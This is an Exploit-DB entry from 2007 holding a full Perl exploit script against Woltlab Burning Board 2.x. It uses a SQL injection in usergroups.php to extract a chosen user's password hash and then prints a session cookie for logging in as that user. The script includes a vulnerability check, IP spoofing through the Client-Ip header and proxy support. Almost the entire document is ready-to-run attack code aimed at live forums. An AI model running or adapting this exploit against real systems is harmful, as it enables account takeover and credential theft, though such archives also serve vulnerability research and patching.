Woltlab Burning Board 2.x - 'usergroups.php' SQL Injection

EDB-ID:

3483


Author:

x666

Type:

webapps


Platform:

PHP

Date:

2007-03-15


#!/usr/bin/perl

#    Woltlab Burning Board 2.X usergroups.php SQL Injection exploit - burned2.pl

#    written by x666 <blueshisha@safe-mail.net>

#    jmp-esp.kicks-ass.net;blueshisha.chills.it

#    SR-CREW

#    should work on every wbb regardless of php settings.

#

#

use strict;

use warnings;

use LWP::UserAgent;

use HTTP::Response;

use HTTP::Status;

use Getopt::Std;

getopt('uiUpAcC');

our ( $opt_u, $opt_i, $opt_s, $opt_U, $opt_p, $opt_A, $opt_c, $opt_C );

my $target = shift;

sub do_request($$);

if ( !$target ) { &HELP_MESSAGE; }

if ( !$opt_U && !$opt_C) { &HELP_MESSAGE; }

my ( $host, $folder );



if ( $target =~ /(?:http:\/\/)?([\w\.\-\_]*)(\/.*)?/ ) {



   $host = $1;

   $folder = ( $2 ? $2 : '/' );

   if ( $folder !~ /\/$/ ) { $folder .= '/'; }

   $target = "http://$host$folder" . 'usergroups.php';

}

else { &HELP_MESSAGE; }



my $ip           = ( $opt_i ? $opt_i : '127.0.0.1' );

my ( $userid, $userpassword, $proxy, $proxyip );

( $userid, $userpassword ) = split( ':', $opt_U ) if $opt_U;

( $proxy,  $proxyip )      = split( ':', $opt_p ) if $opt_p;

my $uid = ( $opt_u ? $opt_u : 1 );

my $useragent =

 ( $opt_A ? $opt_A : 'Mozilla/5.0 Gecko/20061206 Firefox/1.5.0.9' );

my $prefix = ( $opt_c ? $opt_c : 'wbb2_' );

my $isHash = 0;



print "burned2.pl written by x666\n";

print "report errors \@ blueshisha\@safe-mail.net.. thx\n";

print "[x] Attacking $target...\n";



if ( $userpassword and $userpassword =~ /([a-f0-9]{32})/ ) { $isHash = 1; }







if ( !$opt_c ) {



my $headers = do_request( '', '' );

if ( $headers =~ /Set-Cookie: (.*?)cookiehash/ ) {

$prefix = $1;

     }

       else { print $headers}



   }



   print "[x] Cookie prefix: $prefix\n";





print "[x] Vulnerable check:";



my $answer;

my $pre;

$answer = do_request( '\'', '' );



if ( $answer =~ /FROM (.*?)_applications/ ) {

   $pre = $1;

   print " Vulnerable\n";




}



elsif ($answer =~ /Ihnen wird der Zutritt zu dieser Seite/

   or $answer =~ /Access denied/ )

{

   print " No Idea\n";

   print "[x] usergroups.php only for users,";

   print " wrong userdetails or wrong cookie-prefix!\n" if $opt_U;





   exit;

}

else {

   print " Not Vulnerable!\n";

       print $answer;

   exit;

}



print "[x] Unleashing black magic...\n";


$answer = do_request(

   '/**/UNIoN/**/ SeLeCT/**/ CoNcAT(password,CHAR(39)),'.$userid.' FROM '.$pre.'_users wHere userid%3D'.$uid.'/*%5D',''

);



if ( $answer =~ /${folder}usergroups.php/ and $answer =~ /([a-f0-9]{32})/ ) {

   print "[x] Looks good!\n";

   print "[x] Userid: $uid\n";

   print "[x] Hash: $1\n";

   if ( !$opt_C ) {

       print

"[x] Use this Cookie:\n ${prefix}userid=$uid;${prefix}userpassword=$1\n";

   }



}

else {

   print "[x] Looks bad!\n";

  print $answer;



}



sub HELP_MESSAGE() {

   print "burned2.pl written by x666\n"

     . "perl $0 [options] url\n"

     . "examples:\n"

     . "perl $0 -U 10:123456 woltlab.de/de/forum/\n"

     . "perl $0 -u 2 -i 127.0.0.2 -U 10:123456 woltlab.de/de/forum/\n"

     . "overwrite -c only when the auto-check "

     . "gives you a false result\n"

     . "use -C when you need some special cookies\n"

     . "options :\n-u userid of victim [1]\n"

     . "-i faked client-ip [127.0.0.1]\n"

     . "-U userid:password or userid:pwhash [none]\n"

     . "-p proxyip:proxyport [none]\n"

     . "-A user-agent [firefox 1.5.09]\n"

     . "-c cookie-prefix [auto-check]\n"

     . "-C raw cookie\n";


   exit;

}



sub do_request($$) {

   my $string   = shift;

   my $otherurl = shift;

   if ($otherurl) { $target = "http://$host$folder" . $otherurl; }

   else { $target = "http://$host$folder" . 'usergroups.php' }

   $string = '/*' if ( !$string );

   my $ua = LWP::UserAgent->new;

   if ($proxy) { $ua->proxy( 'http', "http://$proxy:$proxyip/" ); }

   my $request = new HTTP::Request( 'POST', $target );

   $request->content( 'applicationids%5B0)' . $string . '%5D=1'

         . '&action=groupleaders_deleteapplications');

   $request->authorization_basic('projectb', 'neustart');

   $request->content_type('application/x-www-form-urlencoded');

   $request->header( 'User-Agent' => $useragent );



   if ($opt_U) {

       my $userhash;

       if ( !$isHash ) { $userhash = md5($userpassword); }

       else { $userhash = $userpassword; }

       my $cookie = $prefix

         . 'userid='

         . $userid . ';'

         . $prefix

         . 'userpassword='

         . $userhash;



       $request->header( 'Cookie' => $cookie );

   }

   elsif ($opt_C) {

       $request->header( 'Cookie' => $opt_C );

       $userid=3265;
   }

   $request->header( 'Client-Ip' => $ip );

   my $response = $ua->request($request);

   my $body     = $response->content;

   my $headers  = $response->headers_as_string;



   $body = $response->error_as_HTML if ( $response->is_error );



   return $headers if ( $string eq '/*' and !$response->is_error );

   return $body;

}



# MD5 Code ripped from Libwhisker for bigger portability

# thx rfp :)

{

   my ( @S, @T, @M );

   my $code = '';



   sub md5 {

       return undef if ( !defined $_[0] );    # oops, forgot the data

       my $DATA = _md5_pad( $_[0] );

       &_md5_init() if ( !defined $M[0] );

       return _md5_perl_generated( \$DATA );

   }



   sub _md5_init {

       return if ( defined $S[0] );

       my $i;

       for ( $i = 1 ; $i <= 64 ; $i++ ) {

           $T[ $i - 1 ] = int( ( 2**32 ) * abs( sin($i) ) );

       }

       my @t = ( 7, 12, 17, 22, 5, 9, 14, 20, 4, 11, 16, 23, 6, 10, 15, 21 );

       for ( $i = 0 ; $i < 64 ; $i++ ) {

           $S[$i] = $t[ ( int( $i / 16 ) * 4 ) + ( $i % 4 ) ];

       }

       @M = (

           0, 1, 2,  3,  4,  5,  6,  7,  8,  9,  10, 11, 12, 13, 14, 15,

           1, 6, 11, 0,  5,  10, 15, 4,  9,  14, 3,  8,  13, 2,  7,  12,

           5, 8, 11, 14, 1,  4,  7,  10, 13, 0,  3,  6,  9,  12, 15, 2,

           0, 7, 14, 5,  12, 3,  10, 1,  8,  15, 6,  13, 4,  11, 2,  9

       );

       &_md5_generate();

       my $TEST = _md5_pad('foobar');



       if ( _md5_perl_generated( \$TEST ) ne

           '3858f62230ac3c915f300c664312c63f' )

       {

           die('Error: MD5 self-test not successful.');

       }

   }



   sub _md5_pad {

       my $l = length( my $msg = shift() . chr(128) );

       $msg .= "\0" x ( ( $l % 64 <= 56 ? 56 : 120 ) - $l % 64 );

       $l = ( $l - 1 ) * 8;

       $msg .= pack 'VV', $l & 0xffffffff, ( $l >> 16 >> 16 );

       return $msg;

   }



   sub _md5_generate {

       my $N = 'abcddabccdabbcda';

       my ( $i, $M ) = ( 0, '' );

       $M    = '&0xffffffff' if ( ( 1 << 16 ) << 16 ); # mask for 64bit systems

       $code = <<EOT;

       sub _md5_perl_generated {

   BEGIN { \$^H |= 1; }; # use integer

       my (\$A,\$B,\$C,\$D)=(0x67452301,0xefcdab89,0x98badcfe,0x10325476);

       my (\$a,\$b,\$c,\$d,\$t,\$i);

       my \$dr=shift;

       my \$l=length(\$\$dr);

       for my \$L (0 .. ((\$l/64)-1) ) {

               my \@D = unpack('V16', substr(\$\$dr, \$L*64,64));

               (\$a,\$b,\$c,\$d)=(\$A,\$B,\$C,\$D);

EOT

       for ( $i = 0 ; $i < 16 ; $i++ ) {

           my ( $a, $b, $c, $d ) =

             split( '', substr( $N, ( $i % 4 ) * 4, 4 ) );

           $code .=

             "\$t=((\$$d^(\$$b\&(\$$c^\$$d)))+\$$a+\$D[$M[$i]]+$T[$i])$M;\n";

           $code .=

"\$$a=(((\$t<<$S[$i])|((\$t>>(32-$S[$i]))&((1<<$S[$i])-1)))+\$$b)$M;\n";

       }

       for ( ; $i < 32 ; $i++ ) {

           my ( $a, $b, $c, $d ) =

             split( '', substr( $N, ( $i % 4 ) * 4, 4 ) );

           $code .=

             "\$t=((\$$c^(\$$d\&(\$$b^\$$c)))+\$$a+\$D[$M[$i]]+$T[$i])$M;\n";

           $code .=

"\$$a=(((\$t<<$S[$i])|((\$t>>(32-$S[$i]))&((1<<$S[$i])-1)))+\$$b)$M;\n";

       }

       for ( ; $i < 48 ; $i++ ) {

           my ( $a, $b, $c, $d ) =

             split( '', substr( $N, ( $i % 4 ) * 4, 4 ) );

           $code .= "\$t=((\$$b^\$$c^\$$d)+\$$a+\$D[$M[$i]]+$T[$i])$M;\n";

           $code .=

"\$$a=(((\$t<<$S[$i])|((\$t>>(32-$S[$i]))&((1<<$S[$i])-1)))+\$$b)$M;\n";

       }

       for ( ; $i < 64 ; $i++ ) {

           my ( $a, $b, $c, $d ) =

             split( '', substr( $N, ( $i % 4 ) * 4, 4 ) );

           $code .= "\$t=((\$$c^(\$$b|(~\$$d)))+\$$a+\$D[$M[$i]]+$T[$i])$M;\n";

           $code .=

"\$$a=(((\$t<<$S[$i])|((\$t>>(32-$S[$i]))&((1<<$S[$i])-1)))+\$$b)$M;\n";

       }

       $code .= <<EOT;

               \$A=\$A+\$a\&0xffffffff; \$B=\$B+\$b\&0xffffffff;

               \$C=\$C+\$c\&0xffffffff; \$D=\$D+\$d\&0xffffffff;

       } # for

   return unpack('H*', pack('V4',\$A,\$B,\$C,\$D)); }

EOT

       eval "$code";

   }

}    # md5 package container

# milw0rm.com [2007-03-15]